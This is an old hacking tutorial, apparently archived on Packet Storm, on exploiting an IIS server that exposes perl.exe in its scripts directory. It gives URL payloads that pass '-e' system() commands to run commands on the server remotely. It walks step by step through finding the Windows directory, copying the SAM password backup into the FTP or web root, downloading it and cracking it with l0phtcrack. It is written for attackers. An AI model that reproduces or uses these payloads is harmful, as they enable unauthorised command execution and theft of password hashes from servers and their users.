Rooting IIS using perl.exe.
4a23e1086329c2299a22b2cafa569724dec5d6d523f02d2511ba235d351c3773<HTML>
<HEAD>
<TITLE>Cracking NT with Perl.exe</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000ff" VLINK="#800080">
<B><FONT SIZE=4><P ALIGN="CENTER">Perl.exe</P>
<P ALIGN="CENTER"> </P>
</B></FONT><P>Internet Information Server can be configured to allow the execution of Perl scripts for producing interactive dynamic web pages. The interpreter for these Perl scripts on Windows NT is perl.exe found in the c:\perl5\bin (default) directory.
There are a few ways to enable the running of these perl scripts. The proper way is to add a registry entry :</P>
<P> </P>
<P>HKEY_LOCAL_MACHINE</P>
<P> \SYSTEM</P>
<P> \CURRENTCONTROLSET</P>
<P> \SERVICES</P>
<P> \W3SVC</P>
<P> \PARAMETERS</P>
<P> \SCRIPT MAP</P>
<P> </P>
<P> *.pl "c:\perl5\bin\perl.exe %s %s"</P>
<P> </P>
<P> </P>
<P>Another way of doing it is to have a copy of perl.exe in the c:\inetpub\scripts directory. A remote user can then enter a url like <A HREF="http://www.company.com/scripts/perl.exe?test.pl"><FONT SIZE=2>http://www.company.com/scripts/perl.exe?test.pl</F
ONT></A> and the test.pl perl script will be executed. Allowing a remote user to access perl.exe directly is extremely bad for the Administrator of the server because it can be exploited and I am going to show you how…but first a brief explanation.</P>
<P> </P>
<P>To run a perl script from a command prompt you do the following:</P>
<P> </P>
<P>C:\perl5\bin>perl.exe test.pl</P>
<P> </P>
<P>Perl.exe can take some command line options….one of these being the –e option. This allows you to execute a single perl command. For example: </P>
<P> </P>
<P>C:\perl5\bin>perl.exe –e "print (‘Hello, World’);"</P>
<P> </P>
<P>This will print "Hello, World" on the screen. By now you should be thinking, "Oh, yeh…I see!"</P>
<P>If not then read on.</P>
<P> </P>
<P>You can do a lot of damage with this –e option and executing single commands. Here I’ll give you the URL commands you need in order to find which drive the winnt directory is on, find the ftproot and copy sam._ to it. (sam._ is a compressed version of
the security accounts manager created after a fresh NT installation and updated everytime rdisk.exe (Repair Disk – used for creating a Repair Disk for the NT machine)).</P>
<P> </P>
<B><P>To find the winnt (or equivalent directory eg winnt35) :</P>
</B><P> </P>
<P><FONT SIZE=3>http://www.company.com/scripts/perl.exe?-e%20"system%20('dir%20c:\\');"</FONT></P>
<P> </P>
<P>If it is not on the c:\ drive, change the c:\\ at the end to d:\\ then e:\\ until you find it. To locate the ftproot browse the drives. To confirm you have found the right location for the winnt directory do</P>
<P> </P>
<P><FONT SIZE=3>http://www.company.com/scripts/perl.exe?-e%20"system%20('dir%20c:\\winnt\\repair');"</font></P>
<P> </P>
<P>You are looking for a file called sam._ in that directory listing. To confirm that you have found the ftproot ftp to the site and compare the files…if they are the same you can be pretty sure you have found it. Once you have found both of these you are
now primed to copy sam._ and then copy it to your machine and get cracking. To copy sam._ to the ftproot use the following :</P>
<P> </P>
<P><FONT SIZE=3>http://www.company.com/scripts/perl.exe?e%20"system%20('copy%20c:\\winnt\\repair\\sam._%20d:\\ftp');"</FONT></P>
<P> </P>
<P>In this example the ftproot is d:\ftp. The server should report back saying 1 file(s) copied. If it doesn’t however the administrator may have denied write access to the IUSR_compname account or equivalent….in that case work out another way to retrieve
it.</P>
<P> </P>
<P>Once you have copied sam._ to the ftproot then ftp to the site, logon as Anonymous (if you can) and then issue the command "get sam._" and press enter…..</P>
<P> </P>
<P>If you don't want to copy it to the ftproot you can copy it to the wwwroot instead and then just download it with the following - http://www.company.com/sam._ . Your browser should ask you to open it or save it to the disk. Save it to the disk. Actuall
y, this method is probably less cumbersome than copying it to the ftproot, but that was the way I did it at the time. Once you have the sam._ safely on you’re machine you need to crack it :</P>
<P> </P>
<OL>
<LI>Uncompress the sam._ > expand sam._ samexpanded</LI>
<P> </P>
<LI>Unencrypt samexpanded > samdump samexpanded > samexpanded.txt</LI>
<P> </P>
<LI>Run l0phtcrack on samexpanded.txt</LI></OL>
<P> </P>
<P>Then sit back and wait…or make yourself a coffee and have a smoke.</P>
<P> </P></BODY>
</HTML>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed